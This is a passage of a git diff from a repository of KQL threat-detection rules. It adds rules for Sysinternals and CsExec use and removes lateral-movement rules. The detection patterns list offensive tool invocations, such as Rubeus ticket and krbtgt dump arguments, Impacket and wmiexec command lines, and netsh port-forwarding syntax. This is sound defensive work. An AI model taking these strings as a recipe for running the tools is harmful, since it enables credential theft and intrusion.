ProcessCommandLine contains " /i -s powershell" or ProcessCommandLine contains " /i /s powershell" or ProcessCommandLine contains " /i –s powershell" or ProcessCommandLine contains " /i —s powershell" or ProcessCommandLine contains " /i ―s powershell" or ProcessCommandLine contains " –i -s powershell" or ProcessCommandLine contains " –i /s powershell" or ProcessCommandLine contains " –i –s powershell" or ProcessCommandLine contains " –i —s powershell" or ProcessCommandLine contains " –i ―s powershell" or ProcessCommandLine contains " —i -s powershell" or ProcessCommandLine contains " —i /s powershell" or ProcessCommandLine contains " —i –s powershell" or ProcessCommandLine contains " —i —s powershell" or ProcessCommandLine contains " —i ―s powershell" or ProcessCommandLine contains " ―i -s powershell" or ProcessCommandLine contains " ―i /s powershell" or ProcessCommandLine contains " ―i –s powershell" or ProcessCommandLine contains " ―i —s powershell" or ProcessCommandLine contains " ―i ―s powershell") \ No newline at end of file diff --git a/KQL/rules/Resource Development/pua_csexec_execution.kql b/KQL/rules/Resource Development/pua_csexec_execution.kql new file mode 100644 index 00000000..e8917c10 --- /dev/null +++ b/KQL/rules/Resource Development/pua_csexec_execution.kql @@ -0,0 +1,10 @@ +// Title: PUA - CsExec Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-22 +// Level: high +// Description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001, attack.execution, attack.t1569.002 + +DeviceProcessEvents +| where FolderPath endswith "\\csexec.exe" or ProcessVersionInfoFileDescription =~ "csexec" \ No newline at end of file diff --git a/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql b/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql new file mode 100644 index 00000000..0dbbf755 --- /dev/null +++ b/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql @@ -0,0 +1,13 @@ +// Title: PUA - Sysinternal Tool Execution - Registry +// Author: Markus Neis +// Date: 2017-08-28 +// Level: low +// Description: Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Legitimate use of SysInternals tools +// - Programs that use the same Registry Key + +DeviceRegistryEvents +| where ActionType =~ "RegistryKeyCreated" and RegistryKey endswith "\\EulaAccepted" \ No newline at end of file diff --git a/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql b/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql new file mode 100644 index 00000000..d3ff592c --- /dev/null +++ b/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql @@ -0,0 +1,12 @@ +// Title: PUA - Sysinternals Tools Execution - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-24 +// Level: medium +// Description: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key. +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment + +DeviceRegistryEvents +| where ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\SDelete" or RegistryKey contains "\\Sysinternals") and RegistryKey endswith "\\EulaAccepted" \ No newline at end of file diff --git a/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql b/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql new file mode 100644 index 00000000..cb5b7879 --- /dev/null +++ b/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed SysInternals DebugView Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2020-05-28 +// Level: high +// Description: Detects suspicious renamed SysInternals DebugView execution +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 + +DeviceProcessEvents +| where ProcessVersionInfoProductName =~ "Sysinternals DebugView" and (not((FolderPath endswith "\\Dbgview.exe" and ProcessVersionInfoOriginalFileName =~ "Dbgview.exe"))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql b/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql new file mode 100644 index 00000000..bd4f091f --- /dev/null +++ b/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Execution Of Renamed Sysinternals Tools - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-24 +// Level: high +// Description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool) +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoggedon" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\PsPing" or RegistryKey contains "\\PsService" or RegistryKey contains "\\SDelete") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith "\\psloglist64.exe" or InitiatingProcessFolderPath endswith "\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\PsPing.exe" or InitiatingProcessFolderPath endswith "\\PsPing64.exe" or InitiatingProcessFolderPath endswith "\\PsService.exe" or InitiatingProcessFolderPath endswith "\\PsService64.exe" or InitiatingProcessFolderPath endswith "\\sdelete.exe"))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql b/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql new file mode 100644 index 00000000..5aeb0935 --- /dev/null +++ b/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Keyboard Layout Load +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-12 +// Level: medium +// Description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base) + +DeviceRegistryEvents +| where (RegistryValueData contains "00000429" or RegistryValueData contains "00050429" or RegistryValueData contains "0000042a") and (RegistryKey endswith "\\Keyboard Layout\\Preload*" or RegistryKey endswith "\\Keyboard Layout\\Substitutes*") \ No newline at end of file diff --git a/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql b/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql new file mode 100644 index 00000000..bf26a7da --- /dev/null +++ b/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql @@ -0,0 +1,12 @@ +// Title: Uncommon File Created In Office Startup Folder +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-05 +// Level: high +// Description: Detects the creation of a file with an uncommon extension in an Office application startup folder +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 +// False Positives: +// - False positive might stem from rare extensions used by other Office utilities. + +DeviceFileEvents +| where (((FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP")) and (not((FolderPath endswith ".docb" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dotm" or FolderPath endswith ".mdb" or FolderPath endswith ".mdw" or FolderPath endswith ".pdf" or FolderPath endswith ".wll" or FolderPath endswith ".wwl")))) or ((FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")) and (not((FolderPath endswith ".xll" or FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm" or FolderPath endswith ".xlw"))))) and (not((((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe")) or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql b/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql new file mode 100644 index 00000000..8fb57420 --- /dev/null +++ b/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql @@ -0,0 +1,12 @@ +// Title: Usage of Renamed Sysinternals Tools - RegistrySet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-24 +// Level: high +// Description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where ((RegistryKey contains "\\PsExec" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\Active Directory Explorer") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith "\\psloglist64.exe" or InitiatingProcessFolderPath endswith "\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe"))) and (not(isnull(InitiatingProcessFolderPath))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/vhd_image_download_via_browser.kql b/KQL/rules/Resource Development/vhd_image_download_via_browser.kql new file mode 100644 index 00000000..d3d176b0 --- /dev/null +++ b/KQL/rules/Resource Development/vhd_image_download_via_browser.kql @@ -0,0 +1,14 @@ +// Title: VHD Image Download Via Browser +// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' +// Date: 2021-10-25 +// Level: medium +// Description: Detects creation of ".vhd"/".vhdx" files by browser processes. +Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls. + +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 +// False Positives: +// - Legitimate downloads of ".vhd" files would also trigger this + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe") and FolderPath contains ".vhd" \ No newline at end of file diff --git a/Lateral Movement/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql b/Lateral Movement/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql deleted file mode 100644 index 2846d8ff..00000000 --- a/Lateral Movement/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali -// Date: 2019/12/30 -// Level: medium -// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote -// Tags: attack.lateral_movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002 -DeviceProcessEvents -| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))))) \ No newline at end of file diff --git a/Lateral Movement/HackTool_-_KrbRelayUp_Execution.kql b/Lateral Movement/HackTool_-_KrbRelayUp_Execution.kql deleted file mode 100644 index d07c94db..00000000 --- a/Lateral Movement/HackTool_-_KrbRelayUp_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/04/26 -// Level: high -// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced -// Tags: attack.credential_access, attack.t1558.003, attack.lateral_movement, attack.t1550.003 -DeviceProcessEvents -| where (ProcessCommandLine contains " relay " and ProcessCommandLine contains " -Domain " and ProcessCommandLine contains " -ComputerName ") or (ProcessCommandLine contains " krbscm " and ProcessCommandLine contains " -sc ") or (ProcessCommandLine contains " spawn " and ProcessCommandLine contains " -d " and ProcessCommandLine contains " -cn " and ProcessCommandLine contains " -cp ") or (FolderPath endswith "\\KrbRelayUp.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelayUp.exe") \ No newline at end of file diff --git a/Lateral Movement/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql b/Lateral Movement/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql deleted file mode 100644 index 3ef522cf..00000000 --- a/Lateral Movement/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch -// Date: 2019/09/03 -// Level: high -// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework -// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/C" and ProcessCommandLine contains "Windows\\Temp\\" and ProcessCommandLine contains "&1") and (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs" or InitiatingProcessCommandLine contains "taskeng.exe")) or ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/Q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "\\\\127.0.0.1\\" and ProcessCommandLine contains "&1") and (InitiatingProcessFolderPath endswith "\\wmiprvse.exe" or InitiatingProcessFolderPath endswith "\\mmc.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\services.exe")) \ No newline at end of file diff --git a/Lateral Movement/HackTool_-_Rubeus_Execution.kql b/Lateral Movement/HackTool_-_Rubeus_Execution.kql deleted file mode 100644 index 134f2523..00000000 --- a/Lateral Movement/HackTool_-_Rubeus_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/12/19 -// Level: critical -// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters -// Tags: attack.credential_access, attack.t1003, attack.t1558.003, attack.lateral_movement, attack.t1550.003 -DeviceProcessEvents -| where FolderPath endswith "\\Rubeus.exe" or ProcessVersionInfoOriginalFileName =~ "Rubeus.exe" or ProcessVersionInfoFileDescription =~ "Rubeus" or (ProcessCommandLine contains "asreproast " or ProcessCommandLine contains "dump /service:krbtgt " or ProcessCommandLine contains "dump /luid:0x" or ProcessCommandLine contains "kerberoast " or ProcessCommandLine contains "createnetonly /program:" or ProcessCommandLine contains "ptt /ticket:" or ProcessCommandLine contains "/impersonateuser:" or ProcessCommandLine contains "renew /ticket:" or ProcessCommandLine contains "asktgt /user:" or ProcessCommandLine contains "harvest /interval:" or ProcessCommandLine contains "s4u /user:" or ProcessCommandLine contains "s4u /ticket:" or ProcessCommandLine contains "hash /password:" or ProcessCommandLine contains "golden /aes256:" or ProcessCommandLine contains "silver /user:") \ No newline at end of file diff --git a/Lateral Movement/HackTool_-_SharpMove_Tool_Execution.kql b/Lateral Movement/HackTool_-_SharpMove_Tool_Execution.kql deleted file mode 100644 index 2c391cb7..00000000 --- a/Lateral Movement/HackTool_-_SharpMove_Tool_Execution.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Luca Di Bartolomeo (CrimpSec) -// Date: 2024/01/29 -// Level: high -// Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options. - -// Tags: attack.lateral_movement, attack.t1021.002 -DeviceProcessEvents -| where (FolderPath endswith "\\SharpMove.exe" or ProcessVersionInfoOriginalFileName =~ "SharpMove.exe") or ((ProcessCommandLine contains "action=create" or ProcessCommandLine contains "action=dcom" or ProcessCommandLine contains "action=executevbs" or ProcessCommandLine contains "action=hijackdcom" or ProcessCommandLine contains "action=modschtask" or ProcessCommandLine contains "action=modsvc" or ProcessCommandLine contains "action=query" or ProcessCommandLine contains "action=scm" or ProcessCommandLine contains "action=startservice" or ProcessCommandLine contains "action=taskscheduler") and ProcessCommandLine contains "computername=") \ No newline at end of file diff --git a/Lateral Movement/HackTool_-_WinRM_Access_Via_Evil-WinRM.kql b/Lateral Movement/HackTool_-_WinRM_Access_Via_Evil-WinRM.kql deleted file mode 100644 index 7a831987..00000000 --- a/Lateral Movement/HackTool_-_WinRM_Access_Via_Evil-WinRM.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/07 -// Level: medium -// Description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. -// Tags: attack.lateral_movement, attack.t1021.006 -DeviceProcessEvents -| where (ProcessCommandLine contains "-i " and ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ") and FolderPath endswith "\\ruby.exe" \ No newline at end of file diff --git a/Lateral Movement/HackTool_-_Wmiexec_Default_Powershell_Command.kql b/Lateral Movement/HackTool_-_Wmiexec_Default_Powershell_Command.kql deleted file mode 100644 index 68ddb59a..00000000 --- a/Lateral Movement/HackTool_-_Wmiexec_Default_Powershell_Command.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/08 -// Level: high -// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script -// Tags: attack.defense_evasion, attack.lateral_movement -DeviceProcessEvents -| where ProcessCommandLine contains "-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc" \ No newline at end of file diff --git a/Lateral Movement/MMC_Spawning_Windows_Shell.kql b/Lateral Movement/MMC_Spawning_Windows_Shell.kql deleted file mode 100644 index e74f2325..00000000 --- a/Lateral Movement/MMC_Spawning_Windows_Shell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Karneades, Swisscom CSIRT -// Date: 2019/08/05 -// Level: high -// Description: Detects a Windows command line executable started from MMC -// Tags: attack.lateral_movement, attack.t1021.003 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\mmc.exe" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe") or FolderPath contains "\\BITSADMIN") \ No newline at end of file diff --git a/Lateral Movement/Mstsc.EXE_Execution_From_Uncommon_Parent.kql b/Lateral Movement/Mstsc.EXE_Execution_From_Uncommon_Parent.kql deleted file mode 100644 index 9d8271d6..00000000 --- a/Lateral Movement/Mstsc.EXE_Execution_From_Uncommon_Parent.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/04/18 -// Level: high -// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. -// Tags: attack.lateral_movement -DeviceProcessEvents -| where (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe") \ No newline at end of file diff --git a/Lateral Movement/New_PortProxy_Registry_Entry_Added.kql b/Lateral Movement/New_PortProxy_Registry_Entry_Added.kql deleted file mode 100644 index edd848c1..00000000 --- a/Lateral Movement/New_PortProxy_Registry_Entry_Added.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades) -// Date: 2021/06/22 -// Level: medium -// Description: Detects the modification of the PortProxy registry key which is used for port forwarding. -// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090 -DeviceRegistryEvents -| where RegistryKey contains "\\Services\\PortProxy\\v4tov4\\tcp" \ No newline at end of file diff --git a/Lateral Movement/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Lateral Movement/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql deleted file mode 100644 index bde86a78..00000000 --- a/Lateral Movement/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel -// Date: 2019/01/29 -// Level: medium -// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule -// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090 -DeviceProcessEvents -| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "interface" and ProcessCommandLine contains "portproxy" and ProcessCommandLine contains "add" and ProcessCommandLine contains "v4tov4") or (ProcessCommandLine contains "i " and ProcessCommandLine contains "p " and ProcessCommandLine contains "a " and ProcessCommandLine contains "v ") or (ProcessCommandLine contains "connectp" and ProcessCommandLine contains "listena" and ProcessCommandLine contains "c=")) \ No newline at end of file diff --git a/Lateral Movement/New_Remote_Desktop_Connection_Initiated_Via_Mstsc.EXE.kql b/Lateral Movement/New_Remote_Desktop_Connection_Initiated_Via_Mstsc.EXE.kql deleted file mode 100644 index 24c6c93b..00000000 --- a/Lateral Movement/New_Remote_Desktop_Connection_Initiated_Via_Mstsc.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/01/07 -// Level: medium -// Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. -Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. - -// Tags: attack.lateral_movement, attack.t1021.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " /v:" and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe"))) \ No newline at end of file diff --git a/Lateral Movement/Outbound_RDP_Connections_Over_Non-Standard_Tools.kql b/Lateral Movement/Outbound_RDP_Connections_Over_Non-Standard_Tools.kql deleted file mode 100644 index bec2a777..00000000 --- a/Lateral Movement/Outbound_RDP_Connections_Over_Non-Standard_Tools.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Markus Neis -// Date: 2019/05/15 -// Level: high -// Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. -An initial baseline is required before using this utility to exclude third party RDP tooling that you might use. - -// Tags: attack.lateral_movement, attack.t1021.001, car.2013-07-002 -DeviceNetworkEvents -| where RemotePort == 3389 and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\mstsc.exe", "C:\\Windows\\SysWOW64\\mstsc.exe")))) and (not(((InitiatingProcessFolderPath endswith "\\Avast Software\\Avast\\AvastSvc.exe" or InitiatingProcessFolderPath endswith "\\Avast\\AvastSvc.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dns.exe" and Protocol =~ "udp" and LocalPort == 53) or InitiatingProcessFolderPath =~ "" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Mozilla Firefox\\firefox.exe" or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\Ranger\\SentinelRanger.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" or InitiatingProcessFolderPath endswith "\\RDCMan.exe" or (InitiatingProcessFolderPath endswith "\\FSAssessment.exe" or InitiatingProcessFolderPath endswith "\\FSDiscovery.exe" or InitiatingProcessFolderPath endswith "\\MobaRTE.exe" or InitiatingProcessFolderPath endswith "\\mRemote.exe" or InitiatingProcessFolderPath endswith "\\mRemoteNG.exe" or InitiatingProcessFolderPath endswith "\\Passwordstate.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager64.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManagerFree.exe" or InitiatingProcessFolderPath endswith "\\RSSensor.exe" or InitiatingProcessFolderPath endswith "\\RTS2App.exe" or InitiatingProcessFolderPath endswith "\\RTSApp.exe" or InitiatingProcessFolderPath endswith "\\spiceworks-finder.exe" or InitiatingProcessFolderPath endswith "\\Terminals.exe" or InitiatingProcessFolderPath endswith "\\ws_TunnelService.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\TSplus\\Java\\bin\\HTML5service.exe", "C:\\Program Files (x86)\\TSplus\\Java\\bin\\HTML5service.exe")) or InitiatingProcessFolderPath =~ ""))) \ No newline at end of file diff --git a/Lateral Movement/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql b/Lateral Movement/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql deleted file mode 100644 index 09b3d975..00000000 --- a/Lateral Movement/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/10/01 -// Level: medium -// Description: Detect use of PDQ Deploy remote admin tool -// Tags: attack.execution, attack.lateral_movement, attack.t1072 -DeviceProcessEvents -| where ProcessVersionInfoFileDescription =~ "PDQ Deploy Console" or 